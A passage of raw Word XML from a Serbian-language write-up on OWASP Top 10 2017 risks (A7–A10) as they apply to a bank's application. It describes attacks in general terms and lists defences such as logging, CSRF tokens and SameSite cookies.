      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009A4509">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t>Kada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napadač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jednom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probije</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009A4509">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009A4509">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t>šteta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može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biti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ogromna</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009A4509">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009A4509">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t>Može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doći</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009A4509">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t xml:space="preserve"> do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009A4509">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t>velike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količine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podataka</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009A4509">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t xml:space="preserve">, a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009A4509">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t>šteta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koju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nanese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banci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takođe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velika</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009A4509">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009A4509">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t>Jako</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009A4509">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t xml:space="preserve"> je </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009A4509">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t>teško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zaštititi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009A4509">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t xml:space="preserve"> se </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009A4509">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t>od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ovakvih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napada</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009A4509">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t xml:space="preserve">, a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009A4509">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t>da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li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smo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ranjivi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009A4509">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t xml:space="preserve"> je </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009A4509">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t>lako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proveriti</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009A4509">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009A4509">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t>možemo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009A4509">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t xml:space="preserve"> mi </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009A4509">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t>manuelno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probati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da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probijemo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ili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pustiti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neki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od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pouzdanih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skenera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da</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009A4509">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009A4509">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t>urade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za</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009A4509">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009A4509">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t>nas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009A4509">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A4509" w:rsidRDefault="009A4509" w:rsidP="00743BAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t>Kako</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t xml:space="preserve"> se </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t>zaštititi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t xml:space="preserve">? Mi </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t>koristimo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logove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i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pratimo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ko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šta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radi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t>Takođe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ako</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t xml:space="preserve"> se </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t>uoči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neko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neobično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ponašanje</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t>tj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da</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t xml:space="preserve"> se </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t>unose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neki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podaci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koji</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t xml:space="preserve"> se </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t>normalno</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t xml:space="preserve"> ne </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t>unesu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tu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t>obraća</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t xml:space="preserve"> se </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t>pažnja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na</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t xml:space="preserve"> tog "user-a", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t>i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snimamo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šta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radi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A4509" w:rsidRDefault="009A4509" w:rsidP="00743BAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t>Izvori</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A4509" w:rsidRDefault="009A4509" w:rsidP="00743BAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A4509">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t>https://www.owasp.org/index.php/Top_10_2017-A7-Insufficient_Attack_Protection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A4509" w:rsidRDefault="009A4509" w:rsidP="00743BAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A4509">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t>https://security.stackexchange.com/questions/157213/how-is-insufficient-attack-protection-a-definite-threat-risk-to-an-organization</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A4509" w:rsidRDefault="009A4509" w:rsidP="00743BAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009A4509" w:rsidRPr="00230875" w:rsidRDefault="008155A1" w:rsidP="009A4509">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00230875">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang/>
        </w:rPr>
        <w:t xml:space="preserve">A8 </w:t>
      </w:r>
      <w:r w:rsidR="009A4509" w:rsidRPr="00230875">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00230875">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang/>
        </w:rPr>
        <w:t xml:space="preserve"> Site Request Forgery (CSRF)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008155A1" w:rsidRDefault="008155A1" w:rsidP="008155A1">
      <w:pPr>
        <w:rPr>
          <w:lang/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008155A1" w:rsidRDefault="008155A1" w:rsidP="008155A1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vrsta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jako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opasna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napravi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lažan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zahtev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prevari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žrtvu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umesto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pošalju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njemu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tiče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napadača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njemu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lako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pravi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ovakve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brauzer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šalje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kredencijale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"session cookies"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automatski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8155A1" w:rsidRDefault="008155A1" w:rsidP="008155A1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Otkriti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teško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svakako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preko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analize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penetracion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testing-a.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008155A1" w:rsidRDefault="00230875" w:rsidP="008155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Mnogi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frejmvorci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ugrađenu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odbranu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CSRF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među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njima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Spirng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a mi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njega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koristimo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Još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načina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čtitimo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ovih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ubacujemo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jedinstveni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token u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sakrivenom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polju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kukiju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koristimo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230875">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00230875">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>SameSite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00230875">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>=strict” flag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podržan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brauzeru</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230875" w:rsidRDefault="00230875" w:rsidP="008155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Izvor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230875" w:rsidRPr="008155A1" w:rsidRDefault="00230875" w:rsidP="008155A1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00230875">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang/>
        </w:rPr>
        <w:t>https://www.owasp.org/index.php/Top_10_2017-A8-Cross-Site_Request_Forgery_(CSRF)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A4509" w:rsidRPr="00743BAD" w:rsidRDefault="009A4509" w:rsidP="00743BAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00743BAD" w:rsidRPr="00743BAD" w:rsidRDefault="00743BAD" w:rsidP="00743BAD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00743BAD" w:rsidRPr="00CA4554" w:rsidRDefault="00743BAD" w:rsidP="00CA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34D3" w:rsidRDefault="00A834D3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30875" w:rsidRDefault="00230875" w:rsidP="00230875">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>A9</w:t>
      </w:r>
      <w:r w:rsidRPr="00230875">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang/>
        </w:rPr>
        <w:t xml:space="preserve"> - Using Components with Known Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230875" w:rsidRDefault="00230875" w:rsidP="00230875">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00230875" w:rsidRDefault="00230875" w:rsidP="00230875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230875">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang/>
        </w:rPr>
        <w:t>Napadač</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00230875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230875">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang/>
        </w:rPr>
        <w:t>skeniranjem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00230875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230875">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang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manuelnom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analizom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proverava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koristimo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komponentu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gde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poznato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propuste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lako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raditi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pronađe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rupu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iskoristiti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uvuče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menja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briše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Svakako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banka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smemo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sebi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dozvolimo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takve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stvari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finansijski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gubici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gubitak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kredibiliteta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bili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neizbežni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230875" w:rsidRDefault="009E4CD9" w:rsidP="00230875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Jako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teško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saznati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komponente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propuste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teško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naći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još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veći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problem je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neko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nađe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propust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neće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uvek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prijaviti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9E4CD9" w:rsidRDefault="009E4CD9" w:rsidP="00230875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Šta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preduzme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tom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pitanju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Konstanto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pretraživanje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komponente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ranjive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traganje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boljim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rešenjima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. U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međuvremenu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vršiti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"monitoring"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analizirati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biblioteke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koristimo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9E4CD9" w:rsidRDefault="009E4CD9" w:rsidP="00230875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Izvor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:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E4CD9" w:rsidRDefault="009E4CD9" w:rsidP="00230875">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E4CD9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang/>
        </w:rPr>
        <w:t>https://www.owasp.org/index.php/Top_10_2017-A9-Using_Components_with_Known_Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E4CD9" w:rsidRDefault="009E4CD9" w:rsidP="00230875">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009E4CD9" w:rsidRDefault="009E4CD9" w:rsidP="009E4CD9">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E4CD9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang/>
        </w:rPr>
        <w:t xml:space="preserve">A10 - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009E4CD9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang/>
        </w:rPr>
        <w:t>Underprotected</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009E4CD9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang/>
        </w:rPr>
        <w:t xml:space="preserve"> APIs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E4CD9" w:rsidRDefault="009E4CD9" w:rsidP="009E4CD9">
      <w:pPr>
        <w:rPr>
          <w:lang/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009E4CD9" w:rsidRDefault="009E4CD9" w:rsidP="009E4CD9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dolazi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do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koda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naklijentskoj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strani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ili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presreće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komunikaciju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to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koristi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uđe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u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sistem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.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Neke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ranjivosti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API-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ja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mogu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automatski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pronaći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, a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neke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samo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stručnjaci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.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testiranje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API-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ja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vrši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istko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kao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u gore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navedenim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slučajevima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, a dobra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stvar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može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biti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korišćenje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nekog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poznatog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formata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za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podatke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jedan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od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njih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je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JSON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koji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 xml:space="preserve"> mi </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AD5B21">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang/>
        </w:rPr>
        <w:t>koristimo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AD5B21">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD5B21" w:rsidRDefault="00AD5B21" w:rsidP="009E4CD9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Najbolji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načini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zaštitimo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:</w:t>
      </w:r>
    </w:p>
